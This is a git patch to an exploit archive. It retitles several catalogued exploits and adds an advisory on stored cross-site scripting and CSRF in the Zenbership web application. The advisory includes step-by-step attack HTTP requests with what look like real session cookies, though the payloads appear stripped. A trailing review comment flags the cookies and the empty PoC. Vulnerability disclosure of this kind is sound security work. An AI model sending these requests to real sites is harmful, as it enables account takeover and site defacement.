From e380b207cec0446a404a2917aa588bf2d7a449da Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Mon, 24 Oct 2016 05:01:19 +0000
Subject: [PATCH] DB: 2016-10-24
1 new exploits
dhclient 4.1 - Bash Environment Variable Command Injection PoC (Shellshock)
dhclient 4.1 - Bash Environment Variable Command Injection (PoC) (Shellshock)
Viscomsoft Calendar Active-X 2.0 - Multiple Crash PoCs
Viscomsoft Calendar Active-X 2.0 - Multiple Crashes (PoC)
Microsoft Excel 2010 - Crash PoC (2)
Microsoft Excel 2010 - Crash (PoC) (2)
Android 5.0 <= 5.1.1 - Stagefright .MP4 tx3g Integer Overflow (Metasploit)
Android 5.0 <= 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit)
The Unarchiver 3.11.1 - '.tar.Z' Crash PoC
The Unarchiver 3.11.1 - '.tar.Z' Crash (PoC)
Microsoft Edge - Function.apply Infomation Leak (MS16-119)
Microsoft Edge - 'Function.apply' Information Leak (MS16-119)
Hak5 WiFi Pineapple - Preconfiguration Command Injection (Metasploit)
Hak5 WiFi Pineapple 2.4 - Preconfiguration Command Injection (Metasploit)
Zenbership 107 - Multiple Vulnerabilities
---
 files.csv | 15 +--
 platforms/php/webapps/40620.txt | 183 ++++++++++++++++++++++++++++++++
 2 files changed, 191 insertions(+), 7 deletions(-)
 create mode 100755 platforms/php/webapps/40620.txt
diff --git a/files.csv b/files.csv
index afafbf47f..d3c5d8ad0 100755
--- a/files.csv
+++ b/files.csv
@@ -33425,7 +33425,7 @@ id,file,description,date,author,platform,type,port
 36930,platforms/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0
 36931,platforms/hardware/remote/36931.txt,"Barracuda CudaTel Communication Server 2.0.029.1 - Multiple HTML Injection Vulnerabilities",2012-03-08,"Benjamin Kunz Mejri",hardware,remote,0
 36932,platforms/windows/remote/36932.py,"RealVNC 4.1.0 / 4.1.1 - Authentication Bypass",2012-05-13,fdiskyou,windows,remote,5900
-36933,platforms/linux/remote/36933.py,"dhclient 4.1 - Bash Environment Variable Command Injection PoC (Shellshock)",2014-09-29,fdiskyou,linux,remote,0
+36933,platforms/linux/remote/36933.py,"dhclient 4.1 - Bash Environment Variable Command Injection (PoC) (Shellshock)",2014-09-29,fdiskyou,linux,remote,0
 36934,platforms/asp/webapps/36934.txt,"SAP Business Objects InfoVew System - listing.aspx searchText Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0
 36935,platforms/asp/webapps/36935.txt,"SAP Business Objects InfoView System - /help/helpredir.aspx guide Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0
 36936,platforms/asp/webapps/36936.txt,"SAP Business Objects InfoView System - /webi/webi_modify.aspx id Parameter Cross-Site Scripting",2012-03-08,vulns@dionach.com,asp,webapps,0
@@ -35840,7 +35840,7 @@ id,file,description,date,author,platform,type,port
 39508,platforms/windows/local/39508.ps1,"Comodo Anti-Virus - SHFolder.dll Local Privilege Elevation Exploit",2016-02-29,Laughing_Mantis,windows,local,0
 39509,platforms/windows/dos/39509.txt,"Crouzet em4 soft 1.1.04 - '.pm4' Integer Division By Zero",2016-03-01,LiquidWorm,windows,dos,0
 39510,platforms/windows/local/39510.txt,"Crouzet em4 soft 1.1.04 and M3 soft 3.1.2.0 - Insecure File Permissions",2016-03-01,LiquidWorm,windows,local,0
-39512,platforms/windows/dos/39512.txt,"Viscomsoft Calendar Active-X 2.0 - Multiple Crash PoCs",2016-03-01,"Shantanu Khandelwal",windows,dos,0
+39512,platforms/windows/dos/39512.txt,"Viscomsoft Calendar Active-X 2.0 - Multiple Crashes (PoC)",2016-03-01,"Shantanu Khandelwal",windows,dos,0
 39513,platforms/php/webapps/39513.txt,"WordPress Plugin CP Polls 1.0.8 - Multiple Vulnerabilities",2016-03-01,"i0akiN SEC-LABORATORY",php,webapps,80
 39514,platforms/php/remote/39514.rb,"ATutor 2.2.1 - SQL Injection / Remote Code Execution (Metasploit)",2016-03-01,Metasploit,php,remote,80
 39515,platforms/windows/remote/39515.rb,"Netgear ProSafe Network Management System 300 - Arbitrary File Upload (Metasploit)",2016-03-01,Metasploit,windows,remote,8080
@@ -36123,7 +36123,7 @@ id,file,description,date,author,platform,type,port
 39815,platforms/lin_x86/shellcode/39815.c,"Linux/x86 - Bindshell with Configurable Port Shellcode (87 bytes)",2016-05-16,JollyFrogs,lin_x86,shellcode,0
 39816,platforms/php/webapps/39816.php,"eXtplorer 2.1.9 - '.ZIP' Directory Traversal",2016-05-16,hyp3rlinx,php,webapps,0
 39817,platforms/php/webapps/39817.php,"Web interface for DNSmasq / Mikrotik - SQL Injection",2016-05-16,hyp3rlinx,php,webapps,0
-39819,platforms/windows/dos/39819.txt,"Microsoft Excel 2010 - Crash PoC (2)",2016-05-16,HauntIT,windows,dos,0
+39819,platforms/windows/dos/39819.txt,"Microsoft Excel 2010 - Crash (PoC) (2)",2016-05-16,HauntIT,windows,dos,0
 39820,platforms/windows/local/39820.txt,"Hex : Shard of Fate 1.0.1.026 - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",windows,local,0
 39821,platforms/python/webapps/39821.txt,"Web2py 2.14.5 - Multiple Vulnerabilities",2016-05-16,"Narendra Bhati",python,webapps,0
 39822,platforms/multiple/webapps/39822.rb,"Meteocontrol WEB’log - Admin Password Disclosure (Metasploit)",2016-05-17,"Karn Ganeshen",multiple,webapps,0
@@ -36569,7 +36569,7 @@ id,file,description,date,author,platform,type,port
 40328,platforms/jsp/webapps/40328.html,"ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting",2016-08-31,LiquidWorm,jsp,webapps,8088
 40329,platforms/php/dos/40329.php,"PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
 40330,platforms/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",windows,local,0
-40436,platforms/android/remote/40436.rb,"Android 5.0 <= 5.1.1 - Stagefright .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0
+40436,platforms/android/remote/40436.rb,"Android 5.0 <= 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0
 40438,platforms/windows/local/40438.txt,"Glassfish Server - Unquoted Service Path Privilege Escalation",2016-09-28,s0nk3y,windows,local,0
 40439,platforms/windows/dos/40439.py,"VLC Media Player 2.2.1 - Buffer Overflow",2016-09-28,"sultan albalawi",windows,dos,0
 40442,platforms/windows/local/40442.txt,"Netgear Genie 2.4.32 - Unquoted Service Path Elevation of Privilege",2016-09-30,Tulpa,windows,local,0
@@ -36675,7 +36675,7 @@ id,file,description,date,author,platform,type,port
 40566,platforms/php/webapps/40566.py,"Pluck CMS 4.7.3 - Cross-Site Request Forgery (Add Page)",2016-10-18,"Ahsan Tahir",php,webapps,0
 40567,platforms/windows/local/40567.py,"LanSpy 2.0.0.155 - Local Buffer Overflow",2016-10-18,n30m1nd,windows,local,0
 40569,platforms/java/webapps/40569.txt,"ManageEngine ServiceDesk Plus 9.2 Build 9207 - Unauthorized Information Disclosure",2016-10-18,p0z,java,webapps,0
-40570,platforms/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash PoC",2016-10-18,"Antonio Z.",osx,dos,0
+40570,platforms/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash (PoC)",2016-10-18,"Antonio Z.",osx,dos,0
 40571,platforms/cgi/webapps/40571.pl,"Cgiemail 1.6 - Source Code Disclosure",2016-10-18,"Finbar Crago",cgi,webapps,80
 40572,platforms/windows/local/40572.cs,"Microsoft Windows - DFS Client Driver Arbitrary Drive Mapping Privilege Escalation (MS16-123)",2016-10-18,"Google Security Research",windows,local,0
 40573,platforms/windows/local/40573.cs,"Microsoft Windows - DeviceApi CMApi PiCMOpenDeviceKey Arbitrary Registry Key Write Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local,0
@@ -36706,12 +36706,12 @@ id,file,description,date,author,platform,type,port
 40599,platforms/windows/dos/40599.txt,"Microsoft Windows - 'win32k.sys' TTF Processing win32k!sbit_Embolden / win32k!ttfdCloseFontContext Use-After-Free (MS16-120)",2016-10-20,"Google Security Research",windows,dos,0
 40600,platforms/windows/dos/40600.txt,"Microsoft Windows Kernel - Registry Hive Loading Negative RtlMoveMemory Size in nt!CmpCheckValueList (MS16-124)",2016-10-20,"Google Security Research",windows,dos,0
 40601,platforms/windows/dos/40601.txt,"Microsoft Windows Kernel - Registry Hive Loading Relative Arbitrary Read in nt!RtlValidRelativeSecurityDescriptor (MS16-123)",2016-10-20,"Google Security Research",windows,dos,0
-40603,platforms/windows/dos/40603.html,"Microsoft Edge - Function.apply Infomation Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
+40603,platforms/windows/dos/40603.html,"Microsoft Edge - 'Function.apply' Information Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
 40605,platforms/windows/dos/40605.html,"Microsoft Edge - Spread Operator Stack Overflow (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
 40606,platforms/windows/local/40606.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
 40607,platforms/windows/local/40607.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
 40608,platforms/windows/local/40608.cs,"Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)",2016-10-20,"Google Security Research",windows,local,0
-40609,platforms/linux/remote/40609.rb,"Hak5 WiFi Pineapple - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,linux,remote,1471
+40609,platforms/linux/remote/40609.rb,"Hak5 
WiFi Pineapple 2.4 - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,linux,remote,1471
 40610,platforms/linux/remote/40610.rb,"OpenNMS - Java Object Unserialization Remote Code Execution (Metasploit)",2016-10-20,Metasploit,linux,remote,1099
 40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' Race Condition Privilege Escalation (Write Access)",2016-10-19,"Phil Oester",linux,local,0
 40612,platforms/php/webapps/40612.txt,"Just Dial Clone Script - SQL Injection",2016-10-21,"Arbin Godar",php,webapps,0
@@ -36720,3 +36720,4 @@ id,file,description,date,author,platform,type,port
 40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' Race Condition Privilege Escalation (SUID)",2016-10-21,"Robin Verton",linux,local,0
 40618,platforms/windows/dos/40618.py,"Oracle VM VirtualBox 4.3.28 - '.ovf' Crash (PoC)",2016-10-21,"sultan albalawi",windows,dos,0
 40619,platforms/hardware/remote/40619.py,"TrendMicro InterScan Web Security Virtual Appliance - Remote Code Execution (Shellshock)",2016-10-21,"Hacker Fantastic",hardware,remote,0
+40620,platforms/php/webapps/40620.txt,"Zenbership 107 - Multiple Vulnerabilities",2016-10-23,Besim,php,webapps,0
diff --git a/platforms/php/webapps/40620.txt b/platforms/php/webapps/40620.txt
new file mode 100755
index 000000000..2338b9033
--- /dev/null
+++ b/platforms/php/webapps/40620.txt
@@ -0,0 +1,183 @@
+1. ADVISORY INFORMATION
+========================================
+Title: Zenbership (latest version) - Multiple Vulnerabilities
+Application: Zenbership
+Class: Sensitive Information disclosure
+Versions Affected: <= latest version )
+Vendor URL: https://www.zenbership.com/
+Software URL: https://www.zenbership.com/Download
+Bugs: CSRF / Persistent Cross Site Scripting
+Date of found: 23.10.2016
+Author: Besim
+
+
+2.CREDIT
+========================================
+Those vulnerabilities was identified by Besim ALTINOK and Mrs. Meryem AKDOĞAN
+
+
+3. VERSIONS AFFECTED
+========================================
+ <= latest version
+
+
+
+4. TECHNICAL DETAILS & POC
+========================================
+
+
+PR1 - Stored Cross Site Scripting
+========================================
+
+1 ) Admin login admin panel
+2 ) Create contact form for guest (http://site_name/path/register.php?action=reset&id=3c035c2)
+3 ) Attacker enter xss payload to last name input
+4 ) XSS Payload run when admin looked contact page (http://site_name/path/admin/index.php?l=contacts)
+5 ) Vulnerability Parameter and Payload : &last_name=
+
+## HTTP Request ##
+
+POST /zenbership/pp-functions/form_process.php HTTP/1.1
+Host: site_name
+User-Agent: Mozilla/5.0 (X11; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://site_name/zenbership/register.php?action=reset&id=3c035c2
+Cookie: phpwcmsBELang=en; PHPSESSID=8jvb8kr06gorp07f62hqta9go5; browserupdateorg=pause; __utma=1.252344004.1477173994.1477173994.1477206731.2; __utmc=1; __utmz=1.1477173994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zenseshold=2bdeaefcdc97966f9d8df00752a5cefd; zen_admin_ses=b2d51bb8f8b895f751dee72db8889bce-470476f3e9d2b2b0d3465b82ce6cd889-7ecb9b7770668e2ecd0a049b60576e44; zen_cart=WJL-1484545251; 
zen_0176e737b450bbd83f5fc1066=253782
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 153
+
+ - POST DATA
+
+page=1
+&session=zen_0176e737b450bbd83f5fc1066
+&first_name=Besim
+&last_name=
+&email=exploit@yopmail.com
+
+
+PR2 - CSRF
+========================================
+
+1 ) Attacker can add new event with xss payload (stored)
+ - File : admin/cp-functions/event-add.php
+
+HTTP Request and CSRF PoC
+=========================
+
+
+## HTTP Request ##
+
+POST /zenbership/admin/cp-functions/event-add.php HTTP/1.1
+Host: site_name
+User-Agent: Mozilla/5.0 (X11; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Referer: http://site_name/zenbership/admin/index.php?l=events
+Content-Length: 1206
+Cookie: phpwcmsBELang=en; PHPSESSID=8jvb8kr06gorp07f62hqta9go5; browserupdateorg=pause; __utma=1.252344004.1477173994.1477173994.1477206731.2; __utmc=1; __utmz=1.1477173994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zenseshold=2bdeaefcdc97966f9d8df00752a5cefd; zen_cart=LKQ-4724862238; zen_admin_ses=b2d51bb8f8b895f751dee72db8889bce-470476f3e9d2b2b0d3465b82ce6cd889-7ecb9b7770668e2ecd0a049b60576e44
+Connection: close
+
+
+ - POST DATA
+
+
+id=JFW996951
+&ext=
+&edit=0
+&event[id]=JFW996951&event[status]=1
+&event[name]=
+&event[tagline]=Meryem&event[description]=

Meryem AKDOGAN

+&event[post_rsvp_message]=

Meryem AKDOGAN

+&event[calendar_id]=1
+&event[custom_template]=
+&tags=
+&event[starts]=2016-10-26 00:00:00
+&event[ends]=2016-10-28 00:00:00
+&event[start_registrations]=2016-10-24 00:00:00
+&event[close_registration]=&event[early_bird_end]=
+&event[online]=0&event[location_name]=Turkey
+&event[url]=&event[address_line_1]=
+&event[address_line_2]=&event[city]=
+&event[state]=&event[zip]=
+&event[country]=
+&event[phone]=
+&limit_attendees_dud=0
+&event[max_rsvps]=
+&event[members_only_view]=0
+&event[members_only_rsvp]=0
+&event[allow_guests]=1
+&event[max_guests]=1
+&form[col2][Account Overview]=section
+&form[col2][company_name]=1
+&form[col2][address_line_1]=0
+&form[col2][address_line_2]=0
+&form[col2][city]=0
+&form[col2][state]=0
+&form[col2][zip]=0
+&form[col2][country]=0
+&form[col2][url]=0
+
+
+
+## CSRF PoC ##
+
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + +
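Review bot: The two `Cookie:` headers in the new advisory (the PR1 request to form_process.php and the PR2 request to event-add.php) carry what look like the tester's real session identifiers (PHPSESSID, zenseshold, zen_admin_ses, zen_cart) plus Google Analytics cookies; these add nothing to the reproduction steps and should be redacted before publication, e.g. `Cookie: PHPSESSID=<redacted>; zen_admin_ses=<redacted>`. The advisory header also disagrees with the files.csv row added in the previous hunk: the CSV names version 107 while the text says `Versions Affected: <= latest version )` (with a stray parenthesis), and `Class: Sensitive Information disclosure` does not describe the CSRF / stored XSS findings that follow. As rendered here the XSS payload bodies (after `&last_name=`, `&event[description]=` and `&event[post_rsvp_message]=`) and the whole "CSRF PoC" block at the end of the file are empty, which may be an artifact of this extraction stripping HTML; if the committed file really omits them, the PoC section does not support the claim it makes.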